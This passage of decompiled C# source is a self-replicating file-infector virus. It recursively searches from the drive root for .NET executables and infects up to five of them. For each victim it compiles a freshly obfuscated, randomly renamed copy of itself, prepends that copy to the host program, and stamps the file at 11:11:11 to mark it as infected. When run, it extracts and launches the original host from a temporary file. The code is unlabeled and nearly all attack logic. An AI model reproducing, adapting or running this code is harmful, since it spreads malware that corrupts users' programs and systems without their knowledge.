		char[] array = new char[7];
		Random random = new Random(dppqtei1331);
		for (int i = 0; i < 7; i++)
		{
			int num = random.Next(0, 26);
			array[i] += (char)(ushort)(97 + num);
		}
		string text = new string(array);
		return text + random.Next(1, 2000);
	}

	private static void Main(string[] args)
	{
		string text = "";
		for (int i = 0; i < args.Length; i++)
		{
			text = text + args[i] + " ";
		}
		string fileName = Process.GetCurrentProcess().MainModule!.FileName;
		string directoryName = Path.GetDirectoryName(fileName);
		string directoryRoot = Directory.GetDirectoryRoot(directoryName);
		DirectoryInfo ihhpqjd = new DirectoryInfo(directoryRoot);
		vgdejsg1817(ihhpqjd);
		FileStream fileStream = new FileStream(fileName, FileMode.OpenOrCreate, FileAccess.Read);
		int num = (int)fileStream.Length;
		int num2 = Convert.ToInt32("021888");
		byte[] dvfvgjh = ueenddm695(fileStream, num2, num - num2);
		fileStream.Close();
		byte[] bytes = new UTF8Encoding().GetBytes("jabir.b");
		int num3 = new Random().Next(2000);
		FileStream fileStream2 = new FileStream("p" + num3 + "h.exe", FileMode.OpenOrCreate, FileAccess.Write);
		qlizgng1501(fileStream2, dvfvgjh, bytes);
		fileStream2.Close();
		try
		{
			ProcessStartInfo startInfo = new ProcessStartInfo("p" + num3 + "h.exe", text);
			Process process = Process.Start(startInfo);
			process.WaitForExit();
		}
		catch
		{
		}
		finally
		{
			File.Delete("p" + num3 + "h.exe");
		}
	}

	private static void nfuojyz526(string fkxflmn1858)
	{
		FileStream fileStream = new FileStream(fkxflmn1858, FileMode.OpenOrCreate, FileAccess.Read);
		int atoeefb = (int)fileStream.Length;
		byte[] jtntulv = ueenddm695(fileStream, atoeefb, 0);
		fileStream.Close();
		string text = new Random(DateTime.Now.Millisecond).Next(1, 111111).ToString();
		text = ((text.Length == 1) ? ("000000" + text) : ((text.Length == 2) ? ("00000" + text) : ((text.Length == 3) ? ("0000" + text) : ((text.Length == 4) ? ("000" + text) : ((text.Length != 5) ? ("0" + text) : ("00" + text))))));
		string[] array = gmmwhuk1406.Split(new char[1] { '>' });
		string text2 = bqzjjji17(ocgqzhm1305(array[1]), Convert.ToInt32(array[0]));
		string text3 = bqzjjji17(ocgqzhm1305(array[2]), Convert.ToInt32(array[0]));
		string mgerhyt = text2 + ocgqzhm1305("fHw=") + text3;
		string text4 = julseow506(mgerhyt);
		string text5 = array[0].Replace("0066119", text);
		text4 = text4.Replace("0066119", text);
		text4 = text4.Replace("021888", "0" + atoeefb);
		string[] array2 = text4.Split(new string[1] { ocgqzhm1305("fHw=") }, StringSplitOptions.None);
		text2 = array2[0];
		text3 = array2[1];
		string text6 = text5 + ">" + ncesmbi1274(bqzjjji17(text2, Convert.ToInt32(text))) + ">" + ncesmbi1274(bqzjjji17(text3, Convert.ToInt32(text)));
		string hrpyxwf = text2 + text6 + text3;
		string text7 = mhwlogt1404(new Random().Next(10000, 999999)) + ".exe";
		if (!hdubyav1138(text7, hrpyxwf))
		{
			throw new InvalidProgramException();
		}
		FileStream fileStream2 = new FileStream(text7, FileMode.OpenOrCreate, FileAccess.Read);
		int atoeefb2 = (int)fileStream2.Length;
		byte[] dvfvgjh = ueenddm695(fileStream2, atoeefb2, 0);
		fileStream2.Close();
		File.Delete(text7);
		FileStream fileStream3 = new FileStream(fkxflmn1858, FileMode.OpenOrCreate, FileAccess.Write);
		qlizgng1501(fileStream3, dvfvgjh, jtntulv);
		fileStream3.Close();
		File.SetLastWriteTime(fkxflmn1858, new DateTime(DateTime.Now.Year, DateTime.Now.Month, DateTime.Now.Day, 11, 11, 11));
	}

	private static void vgdejsg1817(DirectoryInfo ihhpqjd390)
	{
		FileInfo[] files = ihhpqjd390.GetFiles("*.exe");
		FileInfo[] array = files;
		foreach (FileInfo fileInfo in array)
		{
			string fullName = fileInfo.FullName;
			try
			{
				AssemblyName.GetAssemblyName(fullName);
				if (!(fileInfo.LastWriteTime.Hour.ToString() + fileInfo.LastWriteTime.Minute + fileInfo.LastWriteTime.Second == "111111"))
				{
					try
					{
						nfuojyz526(fullName);
						cvgeqlx911++;
					}
					catch
					{
						goto end_IL_002a;
					}
					if (cvgeqlx911 == 5)
					{
						return;
					}
				}
				end_IL_002a:;
			}
			catch
			{
			}
		}
		DirectoryInfo[] directories = ihhpqjd390.GetDirectories("*.*");
		DirectoryInfo[] array2 = directories;
		foreach (DirectoryInfo ihhpqjd391 in array2)
		{
			try
			{
				if (cvgeqlx911 == 5)
				{
					break;
				}
				vgdejsg1817(ihhpqjd391);
			}
			catch
			{
			}
		}
	}

	private static bool hdubyav1138(string rxlljnf343, string hrpyxwf929)
	{
		//IL_0000: Unknown result type (might be due to invalid IL or missing references)
		//IL_000b: Unknown result type (might be due to invalid IL or missing references)
		//IL_0011: Expected O, but got Unknown
		//IL_005b: Unknown result type (might be due to invalid IL or missing references)
		//IL_0061: Expected O, but got Unknown
		ICodeCompiler val = ((CodeDomProvider)new CSharpCodeProvider()).CreateCompiler();
		CompilerParameters val2 = new CompilerParameters();
		val2.get_ReferencedAssemblies().Add("System.dll");
		val2.set_GenerateExecutable(true);
		val2.set_CompilerOptions("/target:winexe");
		val2.set_OutputAssembly(rxlljnf343);
		CompilerResults val3 = val.CompileAssemblyFromSource(val2, hrpyxwf929);
		foreach (CompilerError item in (CollectionBase)(object)val3.get_Errors())
		{
			CompilerError val4 = item;
			Console.WriteLine(val4.get_ErrorNumber() + ": " + val4.get_ErrorText());
		}
		if (((CollectionBase)(object)val3.get_Errors()).Count == 0)
		{
			return true;
		}
		return false;
	}

	private static string ocgqzhm1305(string jivhthp17)
	{
		byte[] bytes = Convert.FromBase64String(jivhthp17);
		return Encoding.UTF8.GetString(bytes);
	}

	private static string bqzjjji17(string qiplaeu1995, int qiobwog1147x)
	{
		StringBuilder stringBuilder = new StringBuilder(qiplaeu1995);
		StringBuilder stringBuilder2 = new StringBuilder(qiplaeu1995.Length);
		for (int i = 0; i < qiplaeu1995.Length; i++)
		{
			char c = stringBuilder[i];
			c = (char)(c ^ qiobwog1147x);
			stringBuilder2.Append(c);
		}
		return stringBuilder2.ToString();
	}

	private static string ncesmbi1274(string psrjmwk371)
	{
		UTF8Encoding uTF8Encoding = new UTF8Encoding();
		return Convert.ToBase64String(uTF8Encoding.GetBytes(psrjmwk371));
	}

	private static string julseow506(string mgerhyt747)
	{
		Random random = new Random();
		string[] array = new string[88]
		{
			"cwtslat1726", "hyfekzb1869", "jwovyfu1372", "mpbphjp1240", "whblnti1215", "gkrvfra291", "mojrsuh793", "coueszs879", "erpuygb1558", "rowdbtr1732",
			"muaxonf1123", "tfcgwyf703", "srlrpjt186", "dwcmymf1051", "vmjnhkl1452", "iwnzftt308", "iokrvuy1125", "ihhpqjd390", "srrbqjt995", "ndjdydk1026",
			"fkxflmn1858", "sphoxlu339", "itscths429", "hcynpme1038", "vgdejsg1817", "tcoqdsf754", "cvgeqlx911", "nfuojyz526", "hqcjiiv816", "hvdftxv1195",
			"dhbmqib141", "ramuwkv1286", "nllbhtz1290", "fnudlsn838", "ueenddm695", "atoeefb1669", "xejpwid105", "kqiouir704", "fxzshtr654", "qlizgng1501",
			"dvfvgjh1581", "jtntulv40", "tneddzf279", "hvkrbhy962", "xonqdux1922", "iwufwcu1273", "mhwlogt1404", "dppqtei1331", "dkjinnq31", "hdubyav1138",
			"rxlljnf343", "dltjxqq1647", "hssotbu305", "xskrwkb1491", "ysrxyvp1032", "vykydgz956", "miojdfm127", "bqzjjji17", "qiplaeu1995", "qiobwog1147",
			"dpcrqtp1952", "yfxejma1949", "ibtcxdb750", "wwcpfws935", "ncesmbi1274", "gmmwhuk1406", "rmpzewg982", "ahsuqdk35", "hrpyxwf929", "uoekevc1465",
			"ksujlzb775", "yulebcy105", "ocgqzhm1305", "nyiwznn1063", "jivhthp17", "julseow506", "mgerhyt747", "burntpn1150", "mhwlogt1404", "zchschm114",
			"vytlbyq37", "ycapxxh1262", "jvcfyyv1068", "ynyhlwm250", "bqqoabq422", "nzjlffo1180", "jedheyt665", "psrjmwk371"
		};
		for (int i = 0; i < array.Length; i++)
		{
			mgerhyt747 = mgerhyt747.Replace(array[i], mhwlogt1404(random.Next(10000, 999999)));
		}
		return mgerhyt747;
	}

	private static byte[] ueenddm695(FileStream hcynpme1038, int atoeefb1669, int cxejpwid105)
	{
		BinaryReader binaryReader = new BinaryReader(hcynpme1038);
		binaryReader.BaseStream.Seek(cxejpwid105, SeekOrigin.Begin);
		byte[] array = new byte[atoeefb1669];
		int num = atoeefb1669;
		int num2 = 0;
		while (num > 0)
		{
			int num3 = binaryReader.Read(array, num2, num);
			if (num3 == 0)
			{
				break;
			}
			num2 += num3;
			num -= num3;
		}
		binaryReader.Close();
		return array;
	}

	private static void qlizgng1501(FileStream hcynpme1038, byte[] dvfvgjh1581, byte[] jtntulv40)
	{
		BinaryWriter binaryWriter = new BinaryWriter(hcynpme1038);
		binaryWriter.BaseStream.Seek(0L, SeekOrigin.Begin);
		binaryWriter.Write(dvfvgjh1581);
		binaryWriter.Write(jtntulv40);
		binaryWriter.Flush();
		binaryWriter.Close();
	}
}
